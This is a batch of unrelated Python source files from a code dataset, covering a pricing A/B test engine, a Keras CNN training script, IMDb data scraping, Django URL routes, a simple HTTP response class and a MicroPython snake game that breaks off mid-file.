backend.getABTest(application_key)\n\t\t\n\t\t# If there is no AB test for application.. we are done\n\t\tif self.abtest == None:\n\t\t\tmonitor.getMonitor().count('PricingNoPriceFound')\n\t\t\traise ApplicationNotFoundException()\n\t\t\n\t\tself.abtest = self.abtest.as_dict()\n\n\t\tif self.abtest['groupAPrices_key'] != None:\n\t\t\tself.groupAPrices = self.__loadPrices(self.abtest['groupAPrices_key'])\n\t\t\n\t\tif self.abtest['groupBPrices_key'] != None:\n\t\t\tself.groupBPrices = self.__loadPrices(self.abtest['groupBPrices_key'])\n\n\t@staticmethod\n\tdef getApplicationPricing(application_key):\n\t\tlastUpdated = PricingEngine.cached.get(application_key, {'time': None})['time']\n\n\t\tif lastUpdated == None or time.time()-lastUpdated>config.AnalyticsStorage['update']:\n\t\t\tPricingEngine.cached[application_key] = {\n\t\t\t\t'prices': PricingEngine(application_key),\n\t\t\t\t'time': time.time()\n\t\t\t}\n\n\t\treturn PricingEngine.cached[application_key]['prices']\n\n\n\t@staticmethod\n\tdef getPricingEngine(name):\n\t\tif name.upper() == 'JSON':\n\t\t\treturn JSONDataEngine\n\t\telif name.upper() == 'CSV':\n\t\t\treturn CSVDataEngine\n\t\telif name.upper() == 'METRICCSV':\n\t\t\treturn MetricCSVDataEngine\n\t\telif name.upper() == 'DTJSON':\n\t\t\treturn DTJSONData\n\t\telif name.upper() == 'SIM':\n\t\t\treturn SimDataEngine\n\t\traise DataEngineException('Pricing data engine not recognized')\n\n\t\n\t@staticmethod\n\tdef validate(price):\n\t\tif type(price) != dict:\n\t\t\tprice = price.as_dict()\n\n\t\tengine = PricingEngine.getPricingEngine(price['engine'])\n\t\tif engine == None:\n\t\t\traise DataEngineException('Unknown pricing engine')\n\n\t\tengine.validate(price)\n\n\n\tdef getPrices(self, user, progress, country=None):\n\t\t\n\t\tuserID = int(user, 16)\n\t\t\n\t\tmonitor.getMonitor().count('PricingUserRequest')\n\n\t\tif userID % self.abtest['modulus'] <= self.abtest['modulusLimit']:\n\t\t\tif self.groupAPrices:\n\t\t\t\treturn (self.abtest['groupAPrices_key'], self.groupAPrices.getPrices(progress, country))\n\t\t\telse:\n\t\t\t\traise NoPricingForGroup()\n\t\telse:\n\t\t\tif self.groupBPrices:\n\t\t\t\treturn (self.abtest['groupBPrices_key'], self.groupBPrices.getPrices(progress, country))\n\t\t\telse:\n\t\t\t\tmonitor.getMonitor().count('PricingNoPrice')\n\t\t\t\traise NoPricingForGroup()\n\n\t\treturn None\n\n\n\tdef __loadPrices(self, prices_key):\n\t\timport core.content.content as content\n\t\tbackend = content.Content()\n\n\t\tdata = backend.getPrice(prices_key).as_dict()\n\n\n\t\tengine = PricingEngine.getPricingEngine(data['engine'])\n\t\tif engine == None: \n\t\t\traise DataEngineException('Unknown pricing engine')\n\n\t\treturn engine(data)\n\t\t\n","sub_path":"core/pricing/pricing.py","file_name":"pricing.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73062000","text":"import json\nimport os.path\n\nimport numpy as np\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.preprocessing import OneHotEncoder\n\nfrom cnn import build_cnn\n\nWEIGHTS_DIR = \"data/weights/\"\nNB_EPOCH = 100\nBATCH_SIZE = 32\nAUGMENTATION = True\n\nif not os.path.exists(WEIGHTS_DIR):\n os.mkdir(WEIGHTS_DIR)\n\noh = OneHotEncoder()\n\ntrain_x, train_y = np.load(\"data/train_x.npy\"), np.load(\"data/train_y.npy\")\ntest_x, test_y = np.load(\"data/test_x.npy\"), np.load(\"data/test_y.npy\")\n\nn_subjects = len(set(train_y))\nn_train = train_x.shape[0]\nn_test = test_x.shape[0]\n\noh.fit(train_y.reshape(-1, 1))\n\ntrain_y = oh.transform(train_y.reshape(-1, 1)).todense()\ntest_y = oh.transform(test_y.reshape(-1, 1)).todense()\n\nprint(\"n_train: {}\".format(n_train))\nprint(\"n_test: {}\".format(n_test))\nprint(\"n_subjects: {}\".format(n_subjects))\n\nwith open(\"data/meta.json\", \"w\") as f:\n json.dump({\"n_subjects\": n_subjects}, f)\n\nmc1 = ModelCheckpoint(\n WEIGHTS_DIR + \"weights.best.h5\",\n monitor=\"val_accuracy\",\n verbose=0,\n save_best_only=True,\n mode=\"max\",\n)\n\nmodel = build_cnn(227, n_subjects)\nmodel.summary()\n\nweights_to_load = WEIGHTS_DIR + \"weights.best.h5\"\n\nif os.path.exists(weights_to_load):\n model.load_weights(weights_to_load)\n\ntry:\n if AUGMENTATION:\n data_gen = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.1,\n horizontal_flip=True,\n )\n\n model.fit_generator(\n data_gen.flow(train_x, train_y, batch_size=BATCH_SIZE),\n steps_per_epoch=train_x.shape[0],\n epochs=NB_EPOCH,\n validation_data=(test_x, test_y),\n callbacks=[mc1],\n )\n else:\n model.fit(\n train_x,\n train_y,\n batch_size=BATCH_SIZE,\n epochs=NB_EPOCH,\n validation_data=(test_x, test_y),\n callbacks=[mc1],\n )\nfinally:\n model.save_weights(WEIGHTS_DIR + \"weights.finally.h5\")\n","sub_path":"1_train_cnn.py","file_name":"1_train_cnn.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"169166301","text":"\"\"\"\n 显示一个 x=3, y=2, z=1 的四面体\n @st\n\"\"\"\n\nfrom simple3D import DisplayObject, Mesh, Window\nfrom simple3D.components.mouseRotate import MouseRotate\nfrom simple3D.mats.lineMeterial import LineMeterial\n\nvertices = [0.0, 0.0, 0.0,\n 1, 0, 0.0,\n 0, 0, 0,\n 0, 1, 0,\n 0, 0, 0,\n 0, 0, 1]\n\nvertices_color = [1, 0, 0,\n 1, 0, 0,\n 0, 1, 0,\n 0, 1, 0,\n 1, 1, 1,\n 1, 1, 1]\n\nindices = [0, 1, 2, 3, 4, 5]\n\ndef get_axis():\n mesh = Mesh(vertices, indices, vectices_color=vertices_color)\n material = LineMeterial()\n displayObj = DisplayObject(mesh, material)\n return displayObj\n\nif __name__ == \"__main__\":\n displayObj = get_axis()\n window = Window()\n window.add(displayObj)\n mover = MouseRotate(window)\n mover.add(displayObj)\n window.add(mover)\n window.render_scene()","sub_path":"examples/draw_line.py","file_name":"draw_line.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574509076","text":"\"\"\"\n문제: https://www.acmicpc.net/problem/13565\n풀이: BFS 탐색\n\"\"\"\n\nimport collections\n\nm, n = map(int, input().split())\ntextile = [input() for _ in range(m)]\npercolate = [[False for _ in range(n)] for _ in range(m)]\n\nq = collections.deque()\nfor j in range(n):\n if textile[0][j] == '0':\n q.append([0, j])\n\nwhile q:\n i, j = q.popleft()\n if 0 <= i < m and 0 <= j < n and \\\n textile[i][j] == '0' and not percolate[i][j]:\n if i == m - 1:\n print(\"YES\")\n break\n percolate[i][j] = True\n q.append([i - 1, j])\n q.append([i + 1, j])\n q.append([i, j - 1])\n q.append([i, j + 1])\nelse:\n print(\"NO\")\n","sub_path":"13565/13565.py","file_name":"13565.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"21208625","text":"from imdb import IMDb\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\nimport re \nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nia = IMDb() # get the imdb instance\ncwd = os.getcwd() # get the working directory\npath_to_database = (os.path.join(cwd, \"database_new.txt\"))\n#path_to_database = \"/Users/asnafatimaali/Desktop/STEVENS/FE595/Midterm_extra/database.txt\" # PATH TO DATABASE \nwith open(path_to_database, 'r') as file: # load in data\n data_base = json.loads(file.read())\n\n\n# to initialize variables for data storage\nreviews = []\nrating_votes = []\ngenres = []\nfirst_genre = []\nmovie_rating = []\nbudget = []\nruntime = [] #in minutes\nnum_actors = []\n\nactors = []\nroles = []\n\nfor ids in data_base.values(): # for the movie ids in the data base get the following\n if ids not in movie_id: \n moveee = ia.get_movie(ids)\n ia.update(moveee, info=['vote details', 'reviews'])\n\n # to get reviews \n try:\n moview_review = \"\"\n for x in range(0,len(moveee['reviews'][x])-1): # imdbpy api only gives you 25 reviews \n one_review = moveee['reviews'][x]['content']\n moview_review = moview_review + \" \" + one_review\n reviews.append(moview_review)\n except IndexError:\n reviews.append(\" \")\n except KeyError:\n reviews.append(\" \")\n\n # to get votes by users. The votes are used by imdb to come up with their score\n try:\n rating_votes.append(moveee['votes'])\n except ValueError:\n rating_votes.append(np.NAN)\n except KeyError:\n rating_votes.append(np.NAN)\n\n # to get genres, we collected all genres and the first one in the list\n\n genres.append(moveee['genres'])\n first_genre.append(moveee['genres'][0])\n\n # Imdb's ratings \n try:\n movie_rating.append(moveee['rating'])\n except ValueError:\n movie_rating.append(np.NAN)\n except KeyError:\n movie_rating.append(np.NAN)\n\n # the budget of the film \n try:\n something = moveee['box office']\n numba = re.split(\" \", something['Budget'])[0]\n numba = re.sub(\"\\$\",\"\", numba)\n numba = re.sub(\",\", \"\", numba)\n numba = re.sub(r\"\\D\",\"\", numba)\n try:\n numba = int(numba)\n except ValueError:\n numba = float(numba)\n except KeyError:\n numba = np.NAN\n budget.append(numba)\n\n\n # the Runtime in minutes\n try:\n runtime = runtime + moveee['runtimes']\n except ValueError:\n runtime.append(np.NAN)\n except KeyError:\n runtime.append(np.NAN)\n\n\n # The number of actor Actors\n try: \n num_actors.append(len(moveee['cast']))\n except KeyError:\n num_actors.append(np.NAN)\n movie_id.append(ids)\n\n# to create a data frame and store the information\nmovie_data = pd.DataFrame()\n\nmovie_data['movie_id'] = movie_id\nmovie_data['reviews'] = reviews\nmovie_data['rating_votes'] = rating_votes\nmovie_data[\"genres\"] = genres\nmovie_data['first_genre'] = first_genre\nmovie_data[\"movie_rating\"] = movie_rating\nmovie_data['budget'] = budget\nmovie_data['runtime'] = runtime\nmovie_data[\"num_actors\"] = num_actors\n \nmovie_data.to_csv('/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/movie_data.csv')\n\n# created a separate loop later to get information on the actors \n#initializing variables \nactor_ids = {}\nmovie_cast = []\nmovie_id = []\n\n# for the actor searched, store the movie id, since order is not perserved in the dictionary, \n# the actors name and their id, from which a dictionary database is being created \n# and the list of actors in the movie \nfor ids in data_base.values():\n movie_id.append(ids)\n moveee = ia.get_movie(ids)\n try:\n cast = moveee['cast']\n cast_string = str(moveee['cast'])\n cast_id = re.findall(r'\\d{7}', cast_string)\n movie_cast.append(cast_id)\n for x in range(0,len(cast_id)-1):\n if cast_id[x] not in actor_ids.values():\n temp = dict({str(cast[x]): cast_id[x]})\n actor_ids.update(temp)\n except KeyError:\n movie_cast.append(\"N/A\")\n except ValueError:\n movie_cast.append(\"N/A\")\n\n# To store actor and their ids\npath_to_store = \"/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/actor_ids.txt\" \nfile = open(path_to_store, 'w+')\nfile.write(json.dumps(actor_ids))\nfile.close()\n\n\nactors_data = pd.DataFrame()\n\nactors_data['cast_ids'] = movie_cast\nactors_data['movie_id'] = movie_id\n\nactors_data.to_csv('/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/actors_data.csv')\n\n# we will be hot encoding the data frame actors_data in which we can get a breakdown of actors by movies \nmovie_cast1 = pd.Series(movie_cast)\n\nmlb = MultiLabelBinarizer()\n\ncast_encoded = pd.DataFrame(mlb.fit_transform(movie_cast1), columns=mlb.classes_, index=movie_cast1.index)\n\n#hot encoding created extra columns which we are removing\nextra_cols = []\nfor x in cast_encoded.columns:\n if x not in actor_ids.values():\n extra_cols.append(x)\n\ndata = cast_encoded\ndata = data.drop(extra_cols, axis=1)\n\ncast_encoded.index = movie_id\n\n# from the hot encoded database we will create a dictionary by actor id key and list of movies values\nactors_in_movies = {}\nfor x in data.columns:\n num_match = data.loc[data[x] == 1]\n index_match = list(num_match.index)\n temp = dict({str(x): index_match}) # dictionary where actor ids are key and movie ids are values\n actors_in_movies.update(temp)\n\n\n# To store actor and their ids\npath_to_store = \"/Users/asnafatimaali/Desktop/STEVENS/FE595/Final/actor_in_movies.txt\" \nfile = open(path_to_store, 'w+')\nfile.write(json.dumps(actors_in_movies))\nfile.close()\n\n","sub_path":"data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"244943128","text":"import os\nimport time\n\npoolsb = [\"ltmPoolStatusAvailState\", \"ltmPoolStatusEnabledState\", \"ltmPoolMemberCnt\", \"ltmPoolMinActiveMembers\",\\\n \"ltmPoolActiveMemberCnt\", \"ltmPoolStatServerCurConns\", \"ltmPoolStatServerMaxConns\"] \n\nos.chdir (\"/Users/rafael/Documents/all_python/git/aloha/data\")\n\ndef processa_reals():\n vet = []\n indice = 0\n tamanho = len(poolsb)\n\n try:\n with open(\"targets_pool\") as b15_pool:\n for each in b15_pool.readlines():\n if \"id_pool\" in each:\n (mull, idpool) = each.strip().split(\"=\")\n idpool = idpool.replace(\"\\\"\", \"\")\n\n if \"display-name\" in each:\n (mull, displayname) = each.strip().split(\"=\")\n displayname = displayname.replace(\"\\\"\", \"\").lower()\n print (displayname)\n\n displayname_idpool = \"[\" + displayname.strip() + \",\" + idpool.strip() + \"]\"\n print (displayname_idpool)\n \n for indice in poolsb:\n saida = indice + displayname_idpool\n print (\"Saida: \", saida + \" \" + str(poolsb.index(indice)))\n \n vet.append(displayname_idpool)\n \n return vet\n \n except FileNotFoundError as fnfe:\n print (\"File Not Found Error\" + str(fnfe))\n \n \n\"\"\" \ndef item_keys():\n saida = processa_reals()\n num = 0\n for dados in poolsb:\n for itens in saida:\n result0 = dados + '[' + itens + ']'\n result1 = result0 + ' ' + str(num) + ' '\n result_txt = result0 + '.txt'\n print (result1 + result_txt + ' > ' + result_txt + \".out\")\n \n num += 1\n\"\"\"\n\nprocessa_reals()\n","sub_path":"bin/poolsb.py","file_name":"poolsb.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"402824257","text":"from configparser import ConfigParser\n\ndef config(filename='data.ini',section='psql'):\n #create a parser\n parser=ConfigParser()\n\n #read config file\n parser.read(filename)\n\n #read or get section\n db = {}\n if parser.has_section(section):\n params=parser.items(section)\n for param in params:\n db[param[0]]=param[1]\n else:\n raise Exception('Section {0} not found in the {1} file', format(section,filename))\n\n return db\n\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"576302592","text":"from django.urls import path, include\nfrom django.conf.urls import url\nfrom matricula import views\n# from django.contrib.auth import logout\n\n\n\nurlpatterns = [\n # Matricula_estudiante\n path(r'matricula_create', views.matricula_create, name='matricula_create'),\n path(r'matricula_edit//', views.matricula_edit, name='matricula_edit'),\n path(r'matricula_detail//', views.MatriculaDetail.as_view(), name = 'matricula_detail'),\n path(r'matricula_list/', views.MatriculaList.as_view(), name = 'matricula_list'),\n\n # Matricula secretaria\n path(r'matriculas_pendientes_list/', views.matriculas_pendientes_list, name = 'matriculas_pendientes_list'),\n path(r'matriculados_list/', views.matriculados_list, name = 'matriculados_list'),\n path(r'matricula_aprobacion//', views.matricula_aprobacion, name = 'matricula_aprobacion'),\n path(r'desaprobar_matricula//', views.desaprobar_matricula, name = 'desaprobar_matricula'),\n path(r'certificado_matricula//', views.certificado_matricula, name = 'certificado_matricula'),\n path(r'matricula_delete//', views.MatriculaDelete.as_view(), name = 'matricula_delete'),\n\n # Lista de Estudiantes\n path(r'form_estudiantes_filter/', views.form_estudiantes_filter, name = 'form_estudiantes_filter'),\n # Solicitud de ingreso\n path(r'solicitud_ingreso_create/', views.solicitud_ingreso_create, name = 'solicitud_ingreso_create'),\n path(r'solicitud_ingreso/', views.solicitud_ingreso, name = 'solicitud_ingreso'),\n path(r'solicitud_ingreso_list/', views.solicitud_ingreso_list, name = 'solicitud_ingreso_list'),\n path(r'solicitudes_pendientes_list/', views.solicitudes_pendientes_list, name = 'solicitudes_pendientes_list'),\n path(r'solicitudes_aprobadas_list/', views.solicitudes_aprobadas_list, name = 'solicitudes_aprobadas_list'),\n path(r'aprobar_solicitud//', views.aprobar_solicitud, name = 'aprobar_solicitud'),\n path(r'ver_solicitud//', views.ver_solicitud, name = 'ver_solicitud'),\n path(r'solicitud_delete//', views.SolicitudIngresoDelete.as_view(), name = 'solicitud_delete'),\n]\n","sub_path":"matricula/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652213018","text":"\"\"\"classroomsonline URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom classrooms import views\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n # Classroom content\n path('', views.home, name='home'), # The home page.\n path('classroom/',\n views.StudentClassroom.as_view(), name='classroom'), # Path to the classroom.\n path('classroom-signup/',\n views.sign_up, name='classroom-signup'), #sign up for classroom\n path('teacher-classroom/',\n views.TeacherClassroom.as_view(), name='teacher-classroom'), #teacher view\n\n # Registration and user auth\n path('register/', views.register_page, name='register'),\n path('login/', views.login_form, name='login'),\n path('logout/', views.logout_view, name='logout'),\n\n #administrative\n #classrooms\n path('administration/', views.administration, name='administration'),\n path('administration/create-new-class/',\n views.create_new_classroom, name='create-new-class'),\n path('administration/edit-classroom//',\n views.edit_classroom, name='edit-classroom'),\n #companies\n path('administration/manage-companies/', views.manage_companies, name='manage-companies'),\n path('administration/manage-companies/add-new-company/',\n views.add_new_company, name='add-new-company'),\n\n path('administration/manage-companies/edit-company//',\n views.edit_company, name='edit-company'),\n #teachers\n path('administration/manage-teachers/', views.manage_teachers, name='manage-teachers'),\n path('administration/manage-teachers/create-new-teacher',\n views.add_new_teacher, name='create-new-teacher'),\n\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"classroomsonline/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"60826520","text":"import datetime, directory\nfrom mimetypes import MimeTypes\n\nclass Cache:\n\n items = {}\n\n @staticmethod\n def add(response):\n Cache.items[response.resource.as_posix()] = response\n\n @staticmethod\n def get(response):\n try:\n return Cache[response.resource.as_posix()]\n except:\n return None\n\nclass Response:\n\n codes = {\"200\":\"OK\",\n \"404\":\"NOT FOUND\"}\n\n def __init__(self, status, resource=None, version=1.1):\n self.version = version\n self.status = f\"HTTP/{self.version} {status} {Response.codes[status]}\\r\\n\"\n self.resource = resource\n \n @property\n def headers(self):\n if self.resource.is_file():\n header = {\"Date\":str(datetime.datetime.now().strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Server\":\"http.py\",\n \"Last-Modified\":str(datetime.datetime.fromtimestamp(float(self.resource.stat().st_mtime)).strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Connection\":\"Closed\",\n \"Content-Length\":str(self.resource.stat().st_size),\n \"Content-Type\":str(MimeTypes().guess_type(self.resource.as_posix()))}\n if self.resource.is_dir():\n header = {\"Date\":str(datetime.datetime.now().strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Server\":\"http.py\",\n \"Last-Modified\":str(datetime.datetime.fromtimestamp(float(self.resource.stat().st_mtime)).strftime('%a %d %b %Y %H:%M:%S %Z')),\n \"Content-Length\":str(len(bytes(directory.listing(self.resource), \"UTF-8\"))),\n \"Content-Type\":\"None, None\",\n \"Connection\":\"Closed\"}\n return header\n\n @property\n def content(self):\n if self.resource.is_dir():\n yield directory.listing(self.resource.as_posix())\n if self.resource.is_file():\n yield self.resource.read_text()\n return \"\\r\\n\"\n\n def __iter__(self):\n yield self.status\n if self.resource:\n if self.headers:\n for key, value in self.headers.items():\n print(f\"{key}: {value}\")\n yield f\"{key}: {value}\\r\\n\"\n yield \"\\r\\n\"\n for chunk in self.content:\n yield chunk\n yield \"\\r\\n\"\n \ndef reply(request):\n cached_response = Cache.get(request.resource)\n if cached_response is not None:\n return cached_response\n if request.resource.exists() is True:\n if request.resource.is_file():\n if request.method == \"GET\":\n response = Response(\"200\", request.resource)\n if request.method == \"HEAD\":\n resource = directory.listing(request.resource)\n response = Response(\"200\", request.resource)\n if request.resource.is_dir():\n if request.method == \"GET\":\n response = Response(\"200\", request.resource)\n if request.method == \"HEAD\":\n resource = directory.listing(request.resource)\n response = Response(\"200\", resource)\n elif request.resource.exists() is False:\n response = Response(\"404\")\n if response is not None:\n Cache.add(response)\n return response\n\n\ndef main():\n from pathlib import Path\n p = Path(\"./accerciser-3.32.1-1-any.pkg.tar.xz\")\n response = Response(\"200\", p)\n assert response.status == \"HTTP/1.1 200 OK\\r\\n\"\n assert response.version == 1.1\n assert response.headers[\"Date\"] == str(datetime.datetime.now().strftime('%a %d %b %Y %H:%M:%S %Z'))\n assert response.headers[\"Server\"] == \"http.py\"\n assert response.headers[\"Last-Modified\"] == str(datetime.datetime.fromtimestamp(float(p.stat().st_mtime)).strftime('%a %d %b %Y %H:%M:%S %Z'))\n assert response.headers[\"Connection\"] == \"Closed\"\n assert response.headers[\"Content-Length\"] == str(p.stat().st_msize)\n assert response.headers[\"Content-Type\"] == str(mimetypes.guess_type(p.read_text()))\n\nif __name__ == \"__main__\":\n main()","sub_path":"response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"308000114","text":"import pandas as pd\nimport numpy as np\nimport os\nimport json\n\nwith open(\"./user_types.json\") as json_file:\n user_types = json.load(json_file)\n\nroot_dir = './data/cresci-2015.csv/'\ndirs = sorted(os.listdir(root_dir))\n\ndf_users = pd.DataFrame()\ndf_tweets = pd.DataFrame()\ndf_friends = pd.DataFrame()\ndf_followers = pd.DataFrame()\n\nfor item in dirs:\n if os.path.isdir(root_dir + item):\n with open(root_dir + item + '/users.csv', 'rb') as users_file:\n is_bot = 1 if item in ['INT.csv', 'FSF.csv', 'TWT.csv'] else 0\n print(item + ': ' + str(is_bot))\n new_data = pd.read_csv(users_file)\n new_data['bot'] = is_bot\n df_users = pd.concat([df_users, new_data])\n \n# with open(root_dir + item + '/tweets.csv', 'rb') as tweets_file:\n# df_tweets = pd.concat([df_tweets, pd.read_csv(tweets_file)])\n# \n# with open(root_dir + item + '/friends.csv', 'rb') as friends_file:\n# df_friends = pd.concat([df_friends, pd.read_csv(friends_file)])\n# \n# with open(root_dir + item + '/followers.csv', 'rb') as followers_file:\n# df_followers = pd.concat([df_followers, pd.read_csv(followers_file)])\n\ndef to_bool(df, var):\n df[var] = pd.to_numeric(df[var]).fillna(0)\n df[var] = df[var].astype('bool')\n return df\nbool_vars = ['geo_enabled', 'profile_use_background_image']\nfor var in bool_vars:\n df_users = to_bool(df_users, var)\n\nprint(df_users.dtypes)","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"106026872","text":"#regex\nimport os\nimport re\n\ncaps = \"([A-Z])\"\nchars = \"([A-Z]|[a-z]|\" \")\"\nmarks = \"([?]|[.]|[!]|[\\])\"\nprefixes = \"(Mr|St|Mrs|Ms|Dr)[.]\"\nsuffixes = \"(Inc|Ltd|Jr|Sr|Co)\"\nstarters = \"(Mr|Mrs|Ms|Dr|He\\s|She\\s|It\\s|They\\s|Their\\s|Our\\s|We\\s|But\\s|However\\s|That\\s|This\\s|Wherever)\"\nacronyms = \"([A-Z][.][A-Z][.](?:[A-Z][.])?)\"\nwebsites = \"[.](com|net|org|io|gov)\"\n\ndef split_into_sentences(text):\n text = \" \" + text + \" \"\n text = text.replace(\"\\n\",\" \")\n text = re.sub(prefixes,\"\\\\1\",text)\n text = re.sub(websites,\"\\\\1\",text)\n if \"Ph.D\" in text: text = text.replace(\"Ph.D.\",\"PhD\")\n text = re.sub(\"\\s\" + caps + \"[.] \",\" \\\\1 \",text)\n text = re.sub(acronyms+\" \"+starters,\"\\\\1 \\\\2\",text)\n text = re.sub(caps + \"[.]\" + caps + \"[.]\" + caps + \"[.]\",\"\\\\1\\\\2\\\\3\",text)\n text = re.sub(caps + \"[.]\" + caps + \"[.]\",\"\\\\1\\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.] \"+starters,\" \\\\1 \\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.]\",\" \\\\1\",text)\n text = re.sub(\" \" + caps + \"[.]\",\" \\\\1\",text)\n if '?\"' in text: text = text.replace('?\"',\"\")\n if '/\"' in text: text = text.replace('/\"',\"\")\n if '!\"' in text: text = text.replace('!\"',\"\")\n text = text.replace(\".\",\".\")\n text = text.replace(\"?\",\"?\")\n text = text.replace(\"!\",\"!\")\n text = text.replace(\"/\",\"/\")\n text = text.replace(\"\",\".\")\n text = text.replace(\"\",\"?\")\n text = text.replace(\"\",\"/\")\n text = text.replace(\"\",\"!\")\n sentences = text.split(\"\")\n sentences = sentences[:-1]\n sentences = [s.strip() for s in sentences]\n return sentences\n\ndef read_files_and_save():\n path = \"ml_data/aclImdb/test/neg/\"\n saved_path = \"ml_data/aclImdb_converted/test-neg-origin.txt\"\n\n filenames = next(os.walk(path))[2]\n texts = []\n\n for name in filenames:\n with open(path + name, \"r\") as f:\n texts.append(f.read())\n\n with open(saved_path, \"w\") as f:\n for text in texts:\n f.write(text + \"\\n\")\n f.close()\n\ndef trim_sentence():\n path = \"ml_data/aclImdb_converted/test-pos-origin.txt\"\n saved_path = \"ml_data/aclImdb_converted/test-pos.txt\"\n text = \"\"\n with open(path, \"r\") as f:\n text = f.read()\n # replace by the following order\n text = re.sub(\"
\", \" \", text)\n punctuation = '([?]|[.]|[!]|[\\]|[(]|[)]|[;]|[,]|[\"]|[{]|[}]|[*]|[+]|[>]|[<])'\n text = re.sub(punctuation, \" \", text)\n text = re.sub(\" '|' \", \" \", text)\n text = re.sub(\" +\", \" \", text)\n text = text.lower()\n\n with open(saved_path, \"w\") as f:\n f.write(text)\n f.close()\n\ndef test_input():\n saved_path = \"ml_data/aclImdb_converted/train-unsup.txt\"\n text = \"\"\n with open(saved_path, \"r\") as f:\n text = f.read()\n print(text.count(\"\\n\"))\n if \"\\n\" in text: \n print(\"YES\")\n else: \n print(\"NO\")","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"149883231","text":"import utime\r\nfrom urandom import randint\r\nimport screen\r\nimport machine\r\n\r\ndef color565(r,g,b):\r\n return r << 16 | g << 8 | b\r\n\r\nclass Display:\r\n def fill(self, background_color):\r\n screen.set_background_color(background_color)\r\n screen.clear()\r\n\r\n def fill_cell(self, x,y,w,h,color):\r\n print(\"cell not support\")\r\n\r\n def fill_rectangle(self, x,y, width, height, color):\r\n path = []\r\n path = path + [x,y] + [x+width,y] + [x+width,y+height] + [x,y+height]\r\n screen.drawpoly(path, color)\r\n\r\ndisplay = Display()\r\n\r\nkeys = [machine.Switch(i) for i in range(4)]\r\n\r\nclass Grid(object):\r\n def __init__(self, master=None,x=10, y=10, w=222, h=303):\r\n self.x = x\r\n self.y = y\r\n self.w = w\r\n self.h = h\r\n self.width=w//10-1\r\n self.height=h//10-1\r\n self.bg=color565(0x00, 0x00, 0x00)\r\n print(self.width,self.height)\r\n display.fill(self.bg)\r\n\r\n def draw(self, pos, color):\r\n x = pos[0] * 10 + self.x+1\r\n y = pos[1] * 10 + self.y+1\r\n display.fill_rectangle(x,y,10,10,color)\r\n \r\nclass Food(object):\r\n def __init__(self, grid, color = color565(0xff, 0x00, 0x00)):\r\n self.grid = grid\r\n self.color = color\r\n self.set_pos()\r\n self.type = 1\r\n\r\n def set_pos(self):\r\n x = randint(0, self.grid.width - 1)\r\n y = randint(0, self.grid.height - 1)\r\n self.pos = (x, y)\r\n\r\n def display(self):\r\n self.grid.draw(self.pos, self.color)\r\n\r\nclass Snake(object):\r\n def __init__(self, grid, color = color565(0xff, 0xff, 0xff)):\r\n self.grid = grid\r\n self.color = color\r\n self.body = [(5, 5), (5, 6), (5, 7)]\r\n self.direction = \"Up\"\r\n for i in self.body:\r\n self.grid.draw(i, self.color)\r\n\r\n #这个方法用于游戏重新开始时初始化贪吃蛇的位置\r\n def initial(self):\r\n while not len(self.body) == 0:\r\n pop = self.body.pop()\r\n self.grid.draw(pop, self.grid.bg)\r\n self.body = [(8, 11), (8, 12), (8, 13)]\r\n self.direction = \"Up\"\r\n self.color = color565(0xff, 0xff, 